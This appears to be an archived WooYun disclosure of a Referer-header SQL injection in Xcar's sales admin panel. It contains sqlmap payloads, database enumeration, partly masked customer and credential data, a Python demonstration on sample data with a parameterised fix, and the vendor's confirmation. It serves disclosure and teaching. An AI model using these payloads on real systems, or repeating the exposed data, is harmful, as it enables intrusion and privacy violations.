WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-01-19: Details sent to the vendor, awaiting vendor handling
2015-01-19: Vendor confirmed; details visible to the vendor only
2015-01-29: Details opened to core white hats and domain experts
2015-02-08: Details opened to regular white hats
2015-02-18: Details opened to intern white hats
2015-03-05: Details opened to the public
233 note: the parts marked with * stand in for real data; a single * does not always replace just one digit.
I'm back again!!! It took me a long time to find this injection point. Login URL: http://sales.xcar.com.cn/admin/login.php. When logging in there is a Referer parameter:

GET /admin/ HTTP/1.1
Referer: *            ------------ here
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=72e891a73d852c734bb02f1678aa5e64; urllog_mkey=1421512336.53
Host: sales.xcar.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
Since we are old acquaintances, I know Xcar does not like people posting its database contents. So this is all the proof I will post; it is only meant to show the vulnerability is real.
---
Parameter: Referer (Referer)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/'||(SELECT 'kWPQ' FROM DUAL WHERE 6984=6984 AND SLEEP(5))||'

Parameter: Referer #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: if(now()=sysdate(),sleep(0),0)/'||(SELECT 'FNqk' FROM DUAL WHERE 5202=5202 AND SLEEP(5))||''XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] sal*
[*] test

Database: sal*
[99 tables]

99 tables. Let's see how much information they hold; here comes the surprise. (You can see order data (name, tel, address), member data, pricing data and so on.)

select count(*) from vi*:        '54099'
select count(*) from or*:        '15420'
select count(*) from order*car:  '15269971'    Is that fifteen million plus?
select count(*) from vip*order:  '6425'

Columns of the vi* table:
| id | fuid | caid | cityid | sale_uid | tel | telc | telb | mapy | name | is4s | sdate | isdel | ischk | edatq | ytype | namepy | coname | vippass | coaname | address | vipuser | link_name | premission | contractnum |

There are name, tel, vipuser, vippass, address. Is that enough? I looked at the first few rows. For example: user gocarpric**, weak password; other passwords were 123456, 112233, and aaa* (just mentioning this here). Now one more table:

Table: ord*
[15420 entries]
| id | jid | xcarid | cityid | mid_add | mid_edit | qq | tel | sex | tag | note | tel2 | name | paytp | issend | dt_add | dt_edit | whenbuy | looked_vipt | sale_otqer_now | sale_prkce_now | scly_otheu_wait | sple_qricu_wcit( |
| * | 10000000C | 0AC | 198 | 2 | 2 | 183***06 | 486***17*708 | 0 | 02 | ir | 3865*707* | 咛炜华 | 0 | 0 | 2013-07/01 19:23:A2 | 2013-07-01 29:23:02 | Ut | <blank> | * | *t | <blank> | <blank> |

That's all!!!
1. First, fix the problem.
2. I remember you asked me for my contact details, but no gift ever came.
3. I'm not asking for a gift, just 20 rank!!!
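To make the mechanism behind this report concrete, here is an added example that is not code from the original report or from Xcar. The page does not show the server-side code, so the vulnerable pattern is a hypothesis: the admin page writes the raw Referer header into a visit-log table by splicing it into the SQL text. SQLite stands in for the MySQL back end, MySQL's SLEEP() is emulated with a user-defined function so the time-based probe works offline, and the vip table with one row (gocarpric / 123456) is constructed sample data. The payloads keep the `'||(SELECT ...)||'` shape of the sqlmap output above, rewritten for SQLite (no FROM DUAL, a short delay instead of SLEEP(5)).

```python
import sqlite3
import time

# Payload 1: extract a value. The header is spliced into '...' so the quotes
# close the literal and concatenate a subquery result into the stored row.
EXTRACT_PAYLOAD = "'||(SELECT vippass FROM vip LIMIT 1)||'"
# Payload 2: time-based probe, same shape as the sqlmap payload on the page,
# in SQLite syntax (no FROM DUAL) and with a 0.3 s delay instead of SLEEP(5).
TIMING_PAYLOAD = "'||(SELECT 'kWPQ' WHERE 6984=6984 AND sleep(0.3))||'"


def emulated_sleep(seconds):
    """Stand-in for MySQL SLEEP(n): block for n seconds, then return 0 like MySQL."""
    time.sleep(seconds)
    return 0


def make_db():
    """In-memory database with constructed sample data: a visit log table and a
    stand-in for the vi* table whose vipuser/vippass columns the report lists."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, emulated_sleep)
    conn.executescript(
        """
        CREATE TABLE access_log (id INTEGER PRIMARY KEY, referer TEXT);
        CREATE TABLE vip (vipuser TEXT, vippass TEXT);
        INSERT INTO vip VALUES ('gocarpric', '123456');  -- constructed row
        """
    )
    return conn


def log_referer_unsafe(conn, referer):
    """Hypothetical vulnerable pattern: header value spliced into the SQL text."""
    conn.execute(f"INSERT INTO access_log (referer) VALUES ('{referer}')")
    conn.commit()


def log_referer_safe(conn, referer):
    """Fixed pattern: bound parameter, so the header is stored as an opaque string."""
    conn.execute("INSERT INTO access_log (referer) VALUES (?)", (referer,))
    conn.commit()


def last_logged(conn):
    """Return the most recently stored referer value."""
    row = conn.execute(
        "SELECT referer FROM access_log ORDER BY id DESC LIMIT 1"
    ).fetchone()
    return row[0]


def timed_log(log_fn, conn, referer):
    """Seconds the logging call took: the signal a time-based blind probe reads."""
    start = time.monotonic()
    log_fn(conn, referer)
    return time.monotonic() - start


if __name__ == "__main__":
    conn = make_db()
    log_referer_unsafe(conn, EXTRACT_PAYLOAD)
    print("unsafe stores:", last_logged(conn))   # 123456 (the leaked vippass)
    log_referer_safe(conn, EXTRACT_PAYLOAD)
    print("safe stores:  ", last_logged(conn))   # the payload text, unevaluated
    print("unsafe probe: %.2fs" % timed_log(log_referer_unsafe, conn, TIMING_PAYLOAD))
    print("safe probe:   %.2fs" % timed_log(log_referer_safe, conn, TIMING_PAYLOAD))
```

The unsafe path stores the subquery's result (the sample password) and stalls for the full delay on the timing payload; the parameterised path stores the payload verbatim and returns immediately, which is exactly the difference a time-based blind scan such as the sqlmap run above keys on. Any request header that ends up in a query (Referer, User-Agent, X-Forwarded-For) needs the same binding, not just form fields.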
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-01-19 16:46
Thanks to @路人甲 for the help; we will fix this as soon as possible! Since we asked for your contact details, a small gift will certainly be sent. A white hat's help will not be forgotten!
None yet